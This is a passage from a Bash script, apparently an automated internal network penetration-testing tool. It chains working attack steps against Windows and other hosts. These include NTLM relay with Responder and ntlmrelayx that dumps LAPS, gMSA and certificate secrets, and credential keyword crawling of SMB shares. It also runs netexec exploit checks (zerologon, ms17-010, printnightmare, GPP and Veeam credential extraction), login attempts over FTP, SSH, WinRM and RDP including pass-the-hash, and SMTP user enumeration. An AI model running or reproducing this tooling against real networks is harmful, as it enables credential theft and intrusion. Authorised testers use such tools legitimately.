and $cleaned_domain are found, then write them to /etc/hosts 388 | echo "${ip}:${host_nmap}.${cleaned_domain}" >> ${ROOT_PATH}/hostname_file.txt 389 | resolve="1" 390 | fi 391 | elif [[ $ligne =~ $regex_FQDN ]] || [[ $ligne =~ $regex_RDP_info_DNS ]];then 392 | FQDN="${BASH_REMATCH[1]}" 393 | echo "${ip}:${FQDN}" >> ${ROOT_PATH}/hostname_file.txt 394 | resolve="1" 395 | fi 396 | fi 397 | done < "$fichier_nmap" 398 | sort -u ${ROOT_PATH}/hostname_file.txt -o ${ROOT_PATH}/hostname_file.txt 399 | 400 | #log "[!] Updating DNS resolver with potential domain found ... " 401 | if [ -s "${DIR_PORTS}/636.txt" ] || [ -s "${DIR_PORTS}/389.txt" ]; then 402 | ip=$(cat ${DIR_PORTS}/636.txt ${DIR_PORTS}/389.txt | sort -u | head -n 1) 403 | domain=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}' | cut -d '.' -f 2-) 404 | 405 | #Backup original file 406 | if [ ! -f "/etc/systemd/resolved.conf.bkp" ]; then 407 | cp /etc/systemd/resolved.conf /etc/systemd/resolved.conf.bkp 408 | fi 409 | cp /etc/systemd/resolved.conf.bkp /etc/systemd/resolved.conf 410 | echo "DNS=${ip}" >> /etc/systemd/resolved.conf 411 | echo "Domains=${domain}" >> /etc/systemd/resolved.conf 412 | sudo systemctl restart systemd-resolved 413 | fi 414 | } 415 | 416 | ########################## SMB NTLM RELAY ################################## 417 | relay () { 418 | log "[🔍] Getting hosts with Relayable SMB" 419 | mkdir ${DIR_VULNS}/NTLM_relay 2>/dev/null 420 | ${proxychains} netexec smb ${ROOT_PATH}/hosts.txt --gen-relay-list ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt < /dev/null > /dev/null 2>&1 421 | # Add 'Skip_Responder_Already_Seen = Off' after 'AutoIgnoreAfterSuccess' if not present (to allow capturing multiple hashes from same user/host) 422 | grep -q '^Skip_Responder_Already_Seen' /usr/share/responder/Responder.conf || sed -i '/^AutoIgnoreAfterSuccess.*/a Skip_Responder_Already_Seen = Off' /usr/share/responder/Responder.conf 423 | if [ -f "${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt" ];then 424 | sort -u ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt -o ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt 425 | nb_relay_vulnerable=$(cat ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt | wc -l) 426 | green_log "${SPACE}[💀] Found $nb_relay_vulnerable devices vulnerable to NTLM relay in the $rangeIP network -> ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt" 427 | #If prochains isn't enabled then try to catch something with responder and ntlmrelay 428 | if [ -z "${proxychains}" ];then 429 | #Turn off SMB,HTTP and HTTPS server on Responder.conf file 430 | responder_file="/usr/share/responder/Responder.conf" 431 | sed -i '/^\s*SMB\s*=\s*On/s/= On/= Off/; /^\s*HTTPS\s*=\s*On/s/= On/= Off/; /^\s*HTTP\s*=\s*On/s/= On/= Off/' "$responder_file" 432 | #Configure proxychains port 1080 (ntlmrelayx) and dynamic_chain (to have possibility of multiples socks) 433 | config_file="/etc/proxychains4.conf" 434 | sed -i '/^strict_chain/s/^/#/' "$config_file" 435 | sed -i '/^random_chain/s/^/#/' "$config_file" 436 | sed -i '/^#.*dynamic_chain/s/^#//' "$config_file" 437 | grep -q "^socks.* 127.0.0.1 1080" "$config_file" || echo 'socks4 127.0.0.1 1080' >> "$config_file" 438 | #responder -I eth0 -b --lm --disable-ess -v; exec bash 439 | if ! which ntlmrelayx.py >/dev/null 2>&1 && ! which ntlmrelayx >/dev/null 2>&1; then 440 | cp /usr/share/doc/python3-impacket/examples/ntlmrelayx.py /usr/bin/ 441 | chmod +x /usr/bin/ntlmrelayx.py 442 | fi 443 | if which terminator > /dev/null 2>&1;then 444 | #terminator --new-tab -m -e "tail -F /root/test" & 445 | terminator --new-tab -m -e "source /tmp/set_title_tab.sh Responder; responder -I ${INTERFACE} -b --disable-ess -v; sleep 5d" & 446 | sleep 1 447 | terminator --new-tab -m -e "source /tmp/set_title_tab.sh RelayNTLM; impacket-ntlmrelayx -tf ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt -smb2support -socks --output-file ${DIR_VULNS}/NTLM_relay/ --dump-laps --dump-gmsa --dump-adcs; sleep 5d" & 448 | else 449 | #export QT_QPA_PLATFORM=offscreen 450 | #qterminal -e "tail -F $logfile" & 451 | x-terminal-emulator -e "source /tmp/set_title_tab.sh Responder; responder -I ${INTERFACE} -b --disable-ess -v; sleep 5d" & 452 | sleep 1 453 | x-terminal-emulator -e "source /tmp/set_title_tab.sh RelayNTLM; impacket-ntlmrelayx -tf ${DIR_VULNS}/ntlm-relay-list.txt -smb2support -socks --output-file ${DIR_VULNS}/NTLM_relay/ --dump-laps --dump-gmsa --dump-adcs; sleep 5d" & 454 | fi 455 | blue_log "${SPACE}[💀] NTLM Relay started, look at socks and folder ${DIR_VULNS}/NTLM_relay/ for user's netNTLM hashes" 456 | else 457 | green_log "${SPACE}[💀] Found $nb_relay_vulnerable devices vulnerable to NTLM relay in the $rangeIP network -> ${DIR_VULNS}/NTLM_relay/ntlm-relay-list.txt" 458 | blue_log "${SPACE} [!] Impossible to launch NTLM Relay via proxychains" 459 | fi 460 | else 461 | red_log "${SPACE}[X] No NTLM relay possible for this range $rangeIP" 462 | responder_file="/usr/share/responder/Responder.conf" 463 | sed -i '/^\s*SMB\s*=\s*Off/s/= Off/= On/; /^\s*HTTPS\s*=\s*Off/s/= Off/= On/; /^\s*HTTP\s*=\s*Off/s/= Off/= On/' "$responder_file" 464 | if which terminator > /dev/null 2>&1;then 465 | #terminator --new-tab -m -e "tail -F /root/test" & 466 | terminator --new-tab -m -e "source /tmp/set_title_tab.sh Responder; responder -I ${INTERFACE} -b --disable-ess -v; sleep 5d" & 467 | else 468 | #export QT_QPA_PLATFORM=offscreen 469 | #qterminal -e "tail -F $logfile" & 470 | x-terminal-emulator -e "source /tmp/set_title_tab.sh Responder; responder -I ${INTERFACE} -b --disable-ess -v; sleep 5d" & 471 | fi 472 | fi 473 | } 474 | 475 | manspider () { 476 | if [ -e "${DIR_PORTS}/445.txt" ]; then 477 | max_size_files_checked="15M" 478 | threads="100" 479 | wordlist="confiden classified bastion '\bcode\w*' creds credential wifi hash ntlm '\bidentifiant\w*' compte utilisateur '\buser\w*' '\b\$.*pass\w*' '\root\w*' '\b\$.*admin\w*' '\badmin\w*' account login 'cpassword\w*' 'pass\w*' cred '\b\$.*pass\w*' cisco pfsense pfx ppk rsa ssh rsa '\bcard\w*' '\bcarte\w*' '\bidentite\w*' '\bidentité\w*' '\bpasseport\w*'" 480 | exclusions="--exclude-dirnames AppData --exclude-extensions DAT LOG2 LOG1 lnk msi" 481 | request_manspider="${proxychains} manspider -n -s $max_size_files_checked -t $threads -c $wordlist $exclusions" 482 | manspider_ip=$(cat ${DIR_PORTS}/445.txt | paste -sd " ") 483 | log "[🔍] Launching manspider" 484 | log "[!] If kerberos only : Netexec spider !" 485 | if which terminator > /dev/null 2>&1;then 486 | terminator --new-tab -m -e "source /tmp/set_title_tab.sh Manspider; $request_manspider -u ${Username} ${cme_creds} $manspider_ip; sleep 5d" & 487 | else 488 | #export QT_QPA_PLATFORM=offscreen 489 | #qterminal -e "tail -F $logfile" & 490 | qterminal -e bash -c "source /tmp/set_title_tab.sh Manspider; $request_manspider -u ${Username} ${cme_creds} $manspider_ip; sleep 5d" & 491 | fi 492 | fi 493 | } 494 | 495 | ########################### CHECK vulnerabilities ################################## 496 | 497 | vulns () { 498 | log "[🔍] Starting vulnerabilty scans on all devices" 499 | if [[ "${Username}" != "anonymous" ]];then 500 | #smb_modules_devices=(coerce_plus ms17-010 zerologon spooler webdav install_elevated gpp_password gpp_autologin enum_av enumdns veeam msol) 501 | smb_modules_devices=(ms17-010 zerologon smbghost printnightmare coerce_plus spooler webdav install_elevated gpp_password gpp_autologin enum_av enumdns veeam msol) 502 | else 503 | smb_modules_devices="" 504 | fi 505 | smb_modules_devices_anonymous=(ms17-010 zerologon smbghost printnightmare coerce_plus) 506 | Devices=$(cat ${ROOT_PATH}/ports/445.txt) 507 | 508 | for module in ${smb_modules_devices_anonymous[@]};do 509 | log "${SPACE}[👁️ ] Checking ${module} vulnerabilies ..." 510 | for ip in $Devices; do 511 | if control_ip_attack; then 512 | host=${ip} 513 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 514 | ${proxychains} timeout ${CME_TIMEOUT} netexec smb $host -u '' -p '' -M ${module} < /dev/null > ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt 2>/dev/null 515 | #cat ${DIR_VULNS}/Vulns_Device_tmp_${module}.txt 516 | if ! grep -Eqio "Unable to detect|does NOT appear vulnerable" ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt && grep -Eqio "vulnerable" ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt;then 517 | if grep -Eqio "COERCE_PLUS" "${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt" && grep -Eqio "vulnerable" "${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt"; then 518 | coerce_vulns=$(cat ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt | grep -i "COERCE_PLUS" | awk -F ", " '{print $2}') 519 | for coerce_vulns_key in $coerce_vulns; do 520 | green_log "${SPACE}${SPACE}[💀] Vulnerabilty '$coerce_vulns_key' via anonymous login found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt" 521 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_$coerce_vulns_key.txt" 522 | done 523 | elif ! grep -Eqio "COERCE_PLUS" ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt; then 524 | green_log "${SPACE}${SPACE}[💀] Vulnerabilty '${module}' via anonymous login found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt" 525 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 526 | fi 527 | fi 528 | fi 529 | done 530 | done 531 | 532 | for module in ${smb_modules_devices[@]};do 533 | log "${SPACE}[👁️ ] Checking ${module} vulnerabilies ..." 534 | #if [[ "${module}" == "coerce_plus" ]]; then 535 | # option_vulns="-o LISTENER=$(ip -o -4 addr show $INTERFACE | awk '{print $4}' | cut -d'/' -f1)" 536 | #else 537 | # option_vulns="" 538 | #fi 539 | for ip in $Devices; do 540 | if control_ip_attack; then 541 | host=${ip} 542 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 543 | #echo "${proxychains} timeout ${CME_TIMEOUT} netexec smb $host -u ${Username} ${cme_creds} -M ${module} ${option_vulns} < /dev/null > ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt 2>/dev/null" 544 | ${proxychains} timeout 30 netexec smb $host -u ${Username} ${cme_creds} -M ${module} ${option_vulns} < /dev/null > ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt 2>/dev/null 545 | #grep -L "Exception while" ${DIR_VULNS}/* | xargs cat | grep -Ev 'SMBv|STATUS_ACCESS_DENIED|Unable to detect|does NOT appear|sodebo\.fr\\:|Error while|STATUS_LOGON_FAILURE' 546 | if grep -Eqo "STATUS_NOT_SUPPORTED|Failed to authenticate the user .* with ntlm" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 547 | if [[ -z ${hostname} ]];then 548 | kerberos="-d $(echo "${hostname}" | cut -d '.' -f 2-) --kerberos" 549 | host="${hostname}" 550 | fi 551 | ${proxychains} timeout 30 netexec smb $host -u ${Username} ${cme_creds} ${kerberos} -M ${module} ${option_vulns} < /dev/null > ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt 2>/dev/null 552 | fi 553 | if [[ ! -f "${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" ]]; then 554 | continue 555 | fi 556 | 557 | if [[ "${module}" == "ms17-010" || "${module}" == "zerologon" || "${module}" == "petitpotam" || "${module}" == "nopac" ]] && ! grep -Eqio "Unable to detect|does NOT appear vulnerable" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt && grep -Eqio "vulnerable" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 558 | # MS17-10 / ZEROLOGON / PETITPOTAM 559 | green_log "${SPACE}${SPACE}[💀] Vulnerabilty '${module}' found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 560 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 561 | elif [[ "${module}" == "gpp_password" || "${module}" == "gpp_password" ]] && grep -Eqio "Found credentials" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 562 | # GPP_PASSWORD 563 | green_log "${SPACE}${SPACE}[💀] Vulnerabilty '${module}' found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 564 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 565 | elif [[ "${module}" == "webdav" || "${module}" == "spooler" ]] && grep -Eqio "${module}" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 566 | # WEBDAV / SPOOLER 567 | green_log "${SPACE}${SPACE}[💀] ${module} found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 568 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 569 | elif [[ "${module}" == "install_elevated" ]] && grep -Eqio "Enabled" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 570 | # INSTALL_ELEVATED 571 | green_log "${SPACE}${SPACE}[💀] install_elevated vulnérability found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 572 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 573 | elif [[ "${module}" == "enum_av" ]] && grep -Eqio "enum_av" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt && ! grep -Eqio "Found NOTHING" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 574 | # ENUM_AV 575 | green_log "${SPACE}${SPACE}[💀] AV identified on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 576 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 577 | elif [[ "${module}" == "enumdns" ]] && grep -Eqio "record" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 578 | # ENUMDNS 579 | green_log "${SPACE}${SPACE}[💀] DNS exfiltration done on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 580 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 581 | elif echo "${module}" | grep -q "coerce_plus" && grep -Eqio "vulnerable" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt ;then 582 | # COERCE_PLUS 583 | coerce_vulns=$(cat ${DIR_VULNS}/Vulns_Device_anonymous_${ip}_${module}.txt | grep -i "COERCE_PLUS" | awk -F ", " '{print $2}') 584 | for coerce_vulns_key in $coerce_vulns; do 585 | green_log "${SPACE}${SPACE}[💀] Vulnerabilty '$coerce_vulns_key' found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 586 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_$coerce_vulns_key.txt" 587 | done 588 | elif echo "${module}" | grep -q "veeam" && grep -Eqio "Extracting stored credentials" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt ;then 589 | green_log "${SPACE}${SPACE}[💀] At least 1 vulnerabilty found on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 590 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 591 | elif echo "${module}" | grep -q "msol" && grep -Eqio "Username:" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt && ! grep -Eqio "Could not retrieve output file" ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt;then 592 | green_log "${SPACE}${SPACE}[💀] MSOL credentials could be find on ${ip} (${hostname}) ! -> ${DIR_VULNS}/Vulns_Device_${ip}_${module}.txt" 593 | echo ${ip} >> "${DIR_VULNS}/Vulns_Devices_${module}.txt" 594 | fi 595 | fi 596 | done 597 | done 598 | sort -u "${DIR_VULNS}/Vulns_Devices_${module}.txt" -o "${DIR_VULNS}/Vulns_Devices_${module}.txt" 599 | } 600 | 601 | ###################### FTP ########################## 602 | ftp () { 603 | if [ -e "${DIR_PORTS}/21.txt" ]; then 604 | # Lire le fichier 21.txt ligne par ligne 605 | log "[🔍] Checking FTP" 606 | 607 | FTP=$(cat ${DIR_PORTS}/21.txt) 608 | for ip in $FTP; do 609 | if control_ip_attack; then 610 | hostname=$(grep -aE "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 611 | log "${SPACE}[📂] Checking ${ip} (${hostname}) ..." 612 | # Essayer de se connecter à l'adresse IP via FTP 613 | ${proxychains} netexec ftp ${ip} -u "anonymous" -p "" < /dev/null >> ${DIR_VULNS}/ftp_anonymous_${ip}.txt 2>/dev/null 614 | 615 | # Vérifier le code de retour de la commande SSH 616 | if grep -aq '\[+\]' ${DIR_VULNS}/ftp_anonymous_${ip}.txt; then 617 | green_log "${SPACE}${SPACE}[💀] FTP ANONYMOUS connection successed" 618 | blue_log "${SPACE}${SPACE} [+] ${proxychains} ftp anonymous@${ip}" 619 | echo "${ip}" >> ${DIR_VULNS}/machines_ftp_anonymous.txt 620 | sort -u ${DIR_VULNS}/machines_ftp_anonymous.txt -o ${DIR_VULNS}/machines_ftp_anonymous.txt 621 | fi 622 | 623 | if [[ "${Username}" != "anonymous" ]];then 624 | ${proxychains} netexec ftp ${ip} -u ${Username} -p ${Password} < /dev/null >> ${DIR_VULNS}/ftp_${Username}_${ip}.txt 2>/dev/null 625 | # Vérifier le code de retour de la commande SSH 626 | if grep -aq '\[+\]' ${DIR_VULNS}/ftp_${Username}_${ip}.txt; then 627 | green_log "${SPACE}${SPACE}[💀] FTP connection successed with ${Username} user" 628 | blue_log "${SPACE}${SPACE} [+] ${proxychains} ftp ${Username}@${ip}" 629 | fi 630 | fi 631 | fi 632 | done 633 | fi 634 | 635 | } 636 | 637 | ###################### SSH ########################## 638 | ssh () { 639 | if [ -e "${DIR_PORTS}/22.txt" ] && [ -n "${Username}" ] && [ "${Username}" != "anonymous" ] && [ -n "${Password}" ]; then 640 | # Lire le fichier 22.txt ligne par ligne 641 | log "[🔍] Checking SSH" 642 | SSH=$(cat ${DIR_PORTS}/22.txt) 643 | for ip in $SSH; do 644 | if control_ip_attack; then 645 | hostname=$(grep -aE "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 646 | log "${SPACE}[📂] Checking ${ip} (${hostname}) ..." 647 | # Essayer de se connecter à l'adresse IP via SSH 648 | #${proxychains} sshpass -p "${Password}" ssh -o StrictHostKeyChecking=no ${Username}@${ip} "ls" 2>/dev/null 649 | 650 | ${proxychains} netexec ssh ${ip} -u ${Username} -p ${Password} < /dev/null >> ${DIR_VULNS}/ssh_${Username}_${ip}.txt 2>/dev/null 651 | # Vérifier le code de retour de la commande SSH 652 | if grep -aq '\[+\]' ${DIR_VULNS}/ssh_${Username}_${ip}.txt; then 653 | green_log "${SPACE}${SPACE}[💀] SSH connection successed" 654 | blue_log "${SPACE}${SPACE} ${proxychains} ssh ${Username}@${ip}" 655 | fi 656 | fi 657 | done 658 | fi 659 | } 660 | 661 | ######## WINRM ####### 662 | winrm () { 663 | # Vérifie si les fichier winrm existe 664 | if { [ -e "${DIR_PORTS}/5985.txt" ] || [ -e "${DIR_PORTS}/5986.txt" ] || [ -e "${DIR_PORTS}/47001.txt" ]; } && [ "${Username}" != "anonymous" ]; then 665 | log "[🔍] Checking WINRM" 666 | for file in ${DIR_PORTS}/5985.txt ${DIR_PORTS}/5986.txt ${DIR_PORTS}/47001.txt; do 667 | cat "${file}" 2>/dev/null >> "${DIR_PORTS}/winrm.txt" 668 | done 669 | sort -u ${DIR_PORTS}/winrm.txt -o ${DIR_PORTS}/winrm.txt 670 | WINRM=$(cat ${DIR_PORTS}/winrm.txt) 671 | for ip in $WINRM; do 672 | if control_ip_attack; then 673 | hostname=$(grep -aE "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 674 | log "${SPACE}[📂] Checking ${ip} (${hostname}) ..." 675 | # Essayer de se connecter à l'adresse IP via WINRM 676 | ${proxychains} netexec --timeout ${CME_TIMEOUT} winrm ${ip} -u "${Username}" ${cme_creds} < /dev/null > ${DIR_VULNS}/winrm_${ip} 2>/dev/null 677 | if grep -Eqo "STATUS_NOT_SUPPORTED" "${DIR_VULNS}/winrm_${ip}" || grep -Eqo "Failed to authenticate the user .* with ntlm" "${DIR_VULNS}/winrm_${ip}"; then 678 | #Si NTLM n'est pas supporté, recommencer en passant avec kerberos 679 | kerberos="--kerberos" 680 | host="${hostname}" 681 | rm ${DIR_VULNS}/winrm_${ip} 682 | ${proxychains} netexec --timeout ${CME_TIMEOUT} winrm $host -u "${Username}" ${cme_creds} ${kerberos} < /dev/null > ${DIR_VULNS}/winrm_${ip} 2>/dev/null 683 | fi 684 | 685 | # Vérifier le code de retour de la commande WINRM 686 | if [ "$(cat ${DIR_VULNS}/winrm_${ip} | grep -ai '\[+\]')" ]; then 687 | green_log "${SPACE}${SPACE}[💀] WINRM connection successed" 688 | if grep -aq '(Pwn3d!)' ${DIR_VULNS}/winrm_${ip}; then 689 | red_log "${SPACE}${SPACE}[💀] ${Username} potentially have admin rights !" 690 | fi 691 | blue_log "${SPACE}${SPACE} [+] ${proxychains} evil-winrm -i ${ip} -u "${Username}" ${cme_creds}" 692 | else 693 | #echo ${DIR_VULNS}/winrm_${ip} 694 | #cat ${DIR_VULNS}/winrm_${ip} 695 | rm ${DIR_VULNS}/winrm_${ip} 696 | fi 697 | fi 698 | done 699 | fi 700 | } 701 | 702 | rdp () { 703 | ######## RDP ####### 704 | # Vérifie si le file 22.txt existe 705 | if [[ -e "${DIR_PORTS}/3389.txt" ]] && [[ "${Username}" != "anonymous" ]]; then 706 | #### Avoid error variable $DISPLAY from xfreerdp 707 | #apt install xvfb 708 | #Xvfb :99 & export DISPLAY=:99 709 | 710 | # Lire le file 22.txt ligne par ligne 711 | log "[🔍] Checking RDP" 712 | RDP=$(cat ${DIR_PORTS}/3389.txt) 713 | for ip in $RDP; do 714 | if control_ip_attack; then 715 | hostname=$(grep -aE "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 716 | rdp_mode="NTLM" 717 | log "${SPACE}[📂] Checking ${ip} (${hostname}) ..." 718 | if [[ "${Username}" != "anonymous" ]]; then 719 | ${proxychains} netexec --timeout ${CME_TIMEOUT} rdp ${ip} -u ${Username} ${cme_creds} --screenshot < /dev/null > ${DIR_VULNS}/rdp_${ip} 2>/dev/null 720 | successed_rdp="${SPACE}${SPACE}[💀] RDP connection successed (via NTLM) -> Can be only available in restricted admin mode or with password" 721 | if grep -Eqo "STATUS_NOT_SUPPORTED" "${DIR_VULNS}/rdp_${ip}" || grep -Eqo "Failed to authenticate the user .* with ntlm" "${DIR_VULNS}/rdp_${ip}"; then 722 | #If NTLM is not supported, restart with kerberos 723 | rdp_mode="KRB" 724 | if [[ -n "${hostname}" ]];then 725 | kerberos="-d $(echo "${hostname}" | cut -d '.' -f 2-) --kerberos" 726 | host="${hostname}" 727 | fi 728 | if [[ -n "${Password}" ]];then 729 | NTLM=$(iconv -f ASCII -t UTF-16LE <(printf "${Password}") | openssl dgst -md4 | awk -F "= " '{print $2}') 730 | #First try with NTLM_Hash 731 | ${proxychains} timeout ${CME_TIMEOUT} netexec rdp $host -u "${Username}" -H "$NTLM" ${kerberos} --screenshot < /dev/null > ${DIR_VULNS}/rdp_${ip} 2>/dev/null 732 | check_rdp=$(grep -o 'Screenshot saved' ${DIR_VULNS}/rdp_${ip} | wc -l) 733 | if [[ "$check_rdp" -gt 0 ]]; then 734 | successed_rdp="${SPACE}${SPACE}[💀] KRB OPSEC - RDP connection successed (via Kerberos only) -> Can be only available in restricted admin mode or with password" 735 | else 736 | #Second try with Password 737 | ${proxychains} timeout ${CME_TIMEOUT} netexec rdp $host -u "${Username}" ${cme_creds} ${kerberos} --screenshot < /dev/null > ${DIR_VULNS}/rdp_${ip} 2>/dev/null 738 | check_rdp=$(grep -o 'Screenshot saved' ${DIR_VULNS}/rdp_${ip} | wc -l) 739 | if [[ "$check_rdp" -gt 0 ]]; then 740 | #Can be detected by disconnection 741 | successed_rdp="${SPACE}${SPACE}[💀] KRB NON OPSEC - RDP connection successed (via Kerberos only) -> Can be only available in restricted admin mode or with password" 742 | fi 743 | fi 744 | else 745 | #Can be detected by disconnection 746 | ${proxychains} timeout ${CME_TIMEOUT} netexec rdp $host -u "${Username}" ${cme_creds} ${kerberos} --screenshot < /dev/null > ${DIR_VULNS}/rdp_${ip} 2>/dev/null 747 | check_rdp=$(grep -o 'Screenshot saved' ${DIR_VULNS}/rdp_${ip} | wc -l) 748 | if [[ "$check_rdp" -gt 0 ]]; then 749 | successed_rdp="${SPACE}${SPACE}[💀] KRB OPSEC - RDP connection successed (via Kerberos only) -> Can be only available in restricted admin mode or with password" 750 | fi 751 | fi 752 | fi 753 | fi 754 | 755 | if grep -aq '\[+\]' ${DIR_VULNS}/rdp_${ip}; then 756 | if grep -aq '(Pwn3d!)' ${DIR_VULNS}/rdp_${ip}; then 757 | red_log "${SPACE}${SPACE}[💀] ${Username} have admin rights !" 758 | admin="1" 759 | fi 760 | check_rdp=$(grep -o 'Screenshot saved' ${DIR_VULNS}/rdp_${ip} | wc -l) 761 | if [[ "$check_rdp" -gt 0 ]]; then 762 | green_log "$successed_rdp" 763 | if [ "$rdp_mode" = "NTLM" ]; then 764 | if [ -n "$NT_Hash" ]; then 765 | blue_log "${SPACE}${SPACE} [+] ${proxychains} xfreerdp3 /cert:tofu /v:${ip} /u:${Username} /pth:${NT_Hash} /sec:nla +clipboard" 766 | else 767 | blue_log "${SPACE}${SPACE} [+] ${proxychains} xfreerdp3 /cert:tofu /v:${ip} /u:${Username} /p:${Password} /sec:nla +clipboard" 768 | fi 769 | fi 770 | fi 771 | fi 772 | fi 773 | done 774 | fi 775 | } 776 | 777 | ######## SMTP ####### 778 | smtp () { 779 | # 25 780 | if [ -e "${DIR_PORTS}/25.txt" ]; then 781 | log "[🔍] Checking SMTP" 782 | SMTP=$(cat ${DIR_PORTS}/25.txt) 783 | for ip in $SMTP; do 784 | if control_ip_attack; then 785 | mode=("VRFY" "RCPT" "EXPN") 786 | for mode_key in $mode; do 787 | ${proxychains} smtp-user-enum -M VRFY -U "/root/pentest_priv/Usernames.txt" -t ${ip} < /dev/null > ${DIR_VULNS}/smtp_${ip}.txt 2>/dev/null 788 | nb_users_smtp=$(grep "exists" "${DIR_VULNS}/smtp_${ip}.txt" | wc -l 2>/dev/null) 789 | nb_users_smtp_max=$(wc -l < "/root/pentest_priv/Usernames.txt" 2>/dev/null) 790 | if [[ "$nb_users_smtp" -ne "$nb_users_smtp_max" ]] && [[ "$nb_users_smtp" -ne 0 ]]; then 791 | green_log "${SPACE}[💀] $nb_users_smtp users found ${ip} via SMTP (mode $mode_key) -> ${DIR_VULNS}/user_smtp_${ip}.txt" 792 | grep "exists" ${DIR_VULNS}/smtp_${ip}.txt | awk '{print $2}' > ${DIR_VULNS}/user_smtp_${ip}.txt 793 | sort -u ${DIR_VULNS}/user_smtp_${ip}.txt -o ${DIR_VULNS}/user_smtp_${ip}.txt 794 | cat ${DIR_VULNS}/user_smtp_${ip}.txt >> ${ROOT_PATH}/users.txt 795 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 796 | fi 797 | done 798 | fi 799 | done 800 | fi 801 | } 802 | 803 | ######## NFS ####### 804 | nfs () { 805 | # Vérifie si le file 2049.txt existe 806 | if [ -e "${DIR_PORTS}/2049.txt" ]; then 807 | log "[🔍] Checking NFS" 808 | NFS=$(cat ${DIR_PORTS}/2049.txt) 809 | for ip in $NFS; do 810 | if control_ip_attack; then 811 | ${proxychains} showmount -e ${ip} < /dev/null > ${DIR_VULNS}/tmp_nfs.txt 2>/dev/null 812 | if [ "$(wc -l < ${DIR_VULNS}/tmp_nfs.txt)" -gt 1 ]; then 813 | green_log "${SPACE}[💀] NFS vulnerability detected on ${ip}" 814 | blue_log "${SPACE}${SPACE}[+] showmount -e ${ip}" 815 | fi 816 | fi 817 | done 818 | fi 819 | } 820 | 821 | ######## VNC ####### 822 | vnc () { 823 | # 5800,5801,5900,5901 824 | if [[ -e "${DIR_PORTS}/5800.txt" ]] || [[ -e "${DIR_PORTS}/5801.txt" ]] || [[ -e "${DIR_PORTS}/5900.txt" ]] || [[ -e "${DIR_PORTS}/5901.txt" ]]; then 825 | log "[🔍] Checking NFS" 826 | for file in ${DIR_PORTS}/5800.txt ${DIR_PORTS}/5801.txt ${DIR_PORTS}/5900.txt ${DIR_PORTS}/5901.txt; do 827 | cat "${file}" 2>/dev/null >> "${DIR_PORTS}/vnc.txt" 828 | done 829 | #assemblage et suppression des doublons des clients 830 | sort -u ${DIR_PORTS}/vnc.txt -o ${DIR_PORTS}/vnc.txt 831 | 832 | green_log "${SPACE}[!] VNC opened on machines (check manually 